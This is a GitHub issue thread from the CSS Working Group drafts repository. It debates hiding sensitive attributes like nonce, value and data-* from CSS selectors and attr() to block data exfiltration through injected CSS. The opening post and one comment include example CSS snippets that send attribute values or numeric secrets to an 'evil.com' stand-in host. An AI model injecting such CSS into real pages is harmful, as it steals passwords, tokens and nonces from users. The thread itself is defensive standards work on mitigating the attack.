w3c / csswg-drafts

CSS Working Group Editor Drafts
https://drafts.csswg.org/
Other
4.5k stars 661 forks source link

[selectors][css-values] Hide "sensitive" attributes from CSS #5136

Open tabatkins opened 4 years ago

tabatkins commented 4 years ago

For a long time, data-exfiltration attacks have been possible using CSS attribute selectors; with careful use of a streaming stylesheet, an attacker can start with input[value^="a"]{background-image:url(https://evil.com/pw-stealer?prefix=a);} (etc for b-z), then based on that result, stream in another set like [value^="ha"], [value^="hb"], etc, and eventually steal the entire attribute value.

This can be used to get script nonces from a page, csrf tokens from a form, and in some DOM libraries that live-reflect input values into the value attribute, can steal usernames and passwords as well.

We have plans to introduce a url() variant that can take functions in its value, a concat() function for joining strings together, and now have a more powerful attr() function that can be used anywhere to fetch the value of an attribute. Combined, these would make the exfiltration attacks trivial; slipping in a simple style="background-image: fetch(concat("https://evil.com/pw-stealer?pw=", attr(value string)));" would grab the attribute in one go, no cleverness required beyond the initial CSS injection.

Since "concat a URL fragment with an attr value" is actually one of the main use-cases for the concat() function, it would be unfortunate to lose that entirely. And doing so wouldn't stop the more complex exfiltration outlined at the start of this message anyway.

@mikewest, in https://groups.google.com/a/chromium.org/d/msg/blink-dev/FGCgsKmylhw/A1vw2xREAgAJ, suggests hiding "sensitive" attributes from CSS entirely: nonce, value on a form control, possibly others. They wouldn't be matchable with attribute selectors, or allow their value to be extracted with attr().

This seems completely reasonable to me; there's no reasonable use-case for nonce to be usable in CSS, and the use-cases for extracting value (displaying in an error message displayed in a ::before?) are weak enough that I'm happy to remove that.

Thoughts?

arturjanc commented 4 years ago

A small note that script nonces are already hidden from CSS as a result of https://github.com/whatwg/html/issues/2369 and https://github.com/whatwg/html/pull/2373; my guess is that for sensitive attributes we may need a different approach though.

In general, I'd be very happy with this change (it's strictly security-positive), but I'm not convinced that it's sufficient to safely enable something like concat(). Modern applications use a large number of custom attributes and sensitive strings can appear in any attribute, e.g. data-user-config can have a JSON object with metadata about the user, including a CSRF token or other secrets. A blocklisting approach for a set of "native" attributes will not cover many instances where sensitive data is available in attributes outside of that list; this will increase the risk for existing applications with such patterns.

It would be helpful to at least consider an alternative allowlist-based approach where by default we permit only certain attributes to be accessed from CSS (e.g. ones that seem likely to be useful for developers, anything with a custom new prefix such as css-foo, etc). Such an allowlist could even be arbitrarily extended by application developers via a JavaScript API -- allowing adding custom CSS-accessible attributes in JS wouldn't be any less safe than the status quo, because an attacker with the capability to execute scripts can already obtain any information from the DOM.

tabatkins commented 4 years ago

Argh, exfiltrating numerics as described in https://github.com/w3c/csswg-drafts/issues/5092#issuecomment-636452209 is clever, and annoying. ^_^

Okay, I've given it some thought, and yeah, I don't see a reasonable way to do this besides an allowlist. Here's my sketch of an idea:

faceless2 commented 4 years ago

We're not quite there yet in terms of browser support, but in theory you could exfiltrate numerics without JavaScript too.

div[secret] {
    background-image: image-set(
        "http://evil.com/2.png" 1dpi,
        "http://evil.com/0.png" calc(mod(attr(secret integer), 2) * 10000dpi)); 
}

@counter-style evil {
    system: symbolic;
    symbols: url(http://evil.com/0.png), url(http://evil.com/1.png)...
}
div[secret]::before {
    counter-reset: foo attr(secret integer);
    content: counter(foo, evil);
}

The first should request "2.png" if the value is modulus 2, "0.png" otherwise. With some prime factors, enough backgrounds and browser support for image-set and mod, you could work out a numeric value. The second won't work because no-one has implemented images for counters yet.

I haven't figured out how to do it for strings yet, but I'm eyeing up @bkardell's "switch" (https://github.com/w3c/csswg-drafts/issues/5009#issuecomment-625478736) and similar proposals. With a suitable font, being able to change the background-image based on an element's width would allow you to sniff the letters in generated content.

So yes I agree something needs fixing here. A few thoughts on your proposal.

tabatkins commented 4 years ago

"Based on origin" doesn't help, as we're wanting to defend against CSS injection, which makes the CSS first-party.

It's probably okay to allow most built-in HTML attributes to be used. Sensitive attributes need to be blocked in general (from Selectors, too), but the rest are likely okay to expose by default, like href in your example. But I think we still have to block data-* by default, and allowlist them in.

xiaochengh commented 4 years ago

Regarding allow-list based approach: will it break the existing usage in pseudo-element content property?

tabatkins commented 4 years ago

My thinking is that no, attr() used at the top-level of 'content' as a "string" type should continue to work with everything, as it does today.

(But it might be okay to restrict it the same way, if we default to allowlisting most HTML attributes. Depends on existing usage of data-* attributes in attr().)

Crissov commented 4 years ago

Every attack relies on <url>. Can all other uses of attr() be considered safe and therefore need no restriction at all?

tabatkins commented 4 years ago

Every attack relies on <url>. Can all other uses of attr() be considered safe and therefore need no restriction at all?

Not true, as I linked in an earlier comment: https://github.com/w3c/csswg-drafts/issues/5092#issuecomment-636452209

xiaochengh commented 4 years ago

My thinking is that no, attr() used at the top-level of 'content' as a "string" type should continue to work with everything, as it does today.

With the latest var()-like spec, it seems pretty hard to distinguish between the old "attr in content as a string" and the advanced "attr in any property as any type".

So I'm not sure how to make them behave differently.

Crissov commented 4 years ago

Fair enough, I should have phrased it as a question: does every attack without Javascript rely on <url>?

tabatkins commented 4 years ago

Possibly (but I wouldn't bet on it without thinking harder). That isn't a meaningful restriction, tho, so the question seems moot anyway.

Crissov commented 4 years ago

It is meaningful insofar as that apparently Javascript should not have access to any properties set by our depending on a host page, e.g. the width of an iframe. I think that part is outside the responsibility of CSS.

Crissov commented 4 years ago

However, perhaps one could phrase a CSS-only restriction for replaced (potentially foreign) elements.

arturjanc commented 4 years ago

Sensitive attributes need to be blocked in general (from Selectors, too), but the rest are likely okay to expose by default, like href in your example. But I think we still have to block data-* by default, and allowlist them in.

My one concern about this specifically is that href, src and other attributes that carry URLs often contain sensitive data; for example, capability URLs include secrets that allow accessing private resources. If we want to limit the exfiltration potential of attr() or other powerful CSS functions, I'd be a little wary of allowlisting such attributes for CSS access by default.

css-meeting-bot commented 4 years ago

The CSS Working Group just discussed [selectors][css-values] Hide "sensitive" attributes from CSS.

The full IRC log of that discussion <dael> Topic: [selectors][css-values] Hide "sensitive" attributes from CSS
<dael> github: https://github.com/w3c/csswg-drafts/issues/5136
<dael> TabAtkins: Review is this allows for a known attack. Makes it a whole lot easier to do background URLs. rather than partly loading and building letter by letter you can instead grab the whole thing and ship it out.
<dael> TabAtkins: Some bits can be crafted with spec language, but some can't. Some attributes will host data and can be extracted. This is a problem
<dael> TabAtkins: I'd like to be able to code this attributes. But I don't want to expose arbiterary data attributes with sensitive information.
<dael> TabAtkins: Some suggestions in the thread about how to solve. Mark some as safe and unsafe and a mech for JS to swap between categories so you can use some attributes safely.
<dael> TabAtkins: I don't know final solution. It's a blocker for attr b/c makes attack easier.
<dael> TabAtkins: Anyone interested in security concerns please review and help me figure out a solution that's not cumbersome or weird
<dael> astearns: Any initial thoughts?
<dael> faceless2_: This is used already in lots of print engines. It would be a shame to break everything by blocking href and other common
<dael> TabAtkins: We should set up spec so that UA in secure spaces can ignore this. I'm concerned about thigns like css injection attacks. Print should be fine and will make sure I allow it
<dael> astearns: Thanks for intro, we'll get back to this
othermaciej commented 4 years ago

Is it a goal for CSS that using a stylesheet from an untrusted source is "safe" in some sense? Because I don't think that would be true with only the change described in the issue. Untrusted CSS could hide elements of the page, inject text and images, make invisible but still clickable elements appear on top of other elements, etc. Making it safe to include untrusted CSS would be a significant project.

bradkemper commented 4 years ago

I think there are legitimate reasons to allow value attribute selectors, and disallowing them would degrade some pages. For instance, this type of thing probably already exists:

input[type="radio"][value="dangerous-choice"] { color: red }
arturjanc commented 4 years ago

Is it a goal for CSS that using a stylesheet from an untrusted source is "safe" in some sense?

I think the goal is to walk a fine line of enabling CSS to ship new, useful features, while preventing security regressions due to the increasing expressive powers of stylesheets, especially as they start approaching the capabilities of scripts. Restricting stylesheets' ability to access sensitive data in the DOM seems like a compromise that can allow this to happen, because it reduces the potential damage of loading CSS outside of the application's control.

It's certainly generally true that developers shouldn't load arbitrary untrusted CSS, but -- in practice -- since the capabilities of stylesheets are lower than the capabilities of scripts, there are many situations where this can still happen. For example:

So it's not really "make untrusted CSS safe to include", but rather "don't make it significantly more unsafe than it currently is".

LeaVerou commented 4 years ago

A few questions:

prlbr commented 4 years ago

@mikewest, in https://groups.google.com/a/chromium.org/d/msg/blink-dev/FGCgsKmylhw/A1vw2xREAgAJ, suggests hiding "sensitive" attributes from CSS entirely: nonce, value on a form control, possibly others. They wouldn't be matchable with attribute selectors, or allow their value to be extracted with attr().

This seems completely reasonable to me; there's no reasonable use-case for nonce to be usable in CSS, and the use-cases for extracting value (displaying in an error message displayed in a ::before?) are weak enough that I'm happy to remove that.

I would be very unhappy about such a change that breaks old website functionality. For instance, I have used CSS access to the value attribute of checkboxes a lot for multiple-choice test like quizzes. Here's a real life example:

<style>
input[value="x"]:checked + label {color:green}
input[value="x"]:checked + label::after {content: " … is correct! ☺"}
input[value=""]:checked + label {color:red}
input[value=""]:checked + label::after {content: " … is wrong."}
</style>

<fieldset>
<legend>Labradors are passionate:</legend>
<input type="checkbox" id="_37" value=""> <label for="_37">mathematicians</label>
<br><input type="checkbox" id="_38" value=""> <label for="_38">guardians</label>
<br><input type="checkbox" id="_39" value=""> <label for="_39">dancers</label>
<br><input type="checkbox" id="_40" value="x"> <label for="_40">swimmers</label>
</fieldset>
arturjanc commented 3 years ago

Would custom elements defining form controls via ElementInternals be able to declare certain attributes as sensitive? Would JS developers be able to declare a sensitive attribute as "non-sensitive" and expose it to CSS somehow? Or is mirroring it to a data- attribute the only way?

I don't think we're at the point of having a specific API proposal here, but IMHO the answer to both questions is that there's nothing preventing us from building an API like this, and it would indeed be useful. Specifically, it would help sites that match on input[value] retain their current functionality, like in the examples mentioned above.

I imagine it would also be possible to build a default allowlist for legacy uses, i.e. we could permit certain functions or properties in combination with commonly used attributes, such as value. This does complicate the design, but it would get us close to allowing backward compatibility while offering a safe path towards shipping new, more powerful, CSS functions.

mildred commented 3 years ago

Such an allowlist could even be arbitrarily extended by application developers via a JavaScript API

Please take into consideration cases where there is no javascript enabled. Perhaps a declarative definition in the <head> element which is far less likely to contain XSS than the <body> ?